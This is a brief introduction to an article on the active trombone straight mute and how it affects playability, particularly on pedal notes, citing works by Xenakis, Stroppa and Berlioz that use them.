Ai?? The Active Trombone Straight Mute Ai??

This article is about the effects of the straight mute on the playability of the trombone, particularly on some of the pedal notes of the instruments, which are the lower notes playable on a trombone. Pedal notes are used in musical pieces, such as Iannis Xenakis’ « Keren », Marco Stroppa’s « From Needle’s Eye » or Hector Berlioz’s « La Symphonie Fantastique » and his « Requiem ».
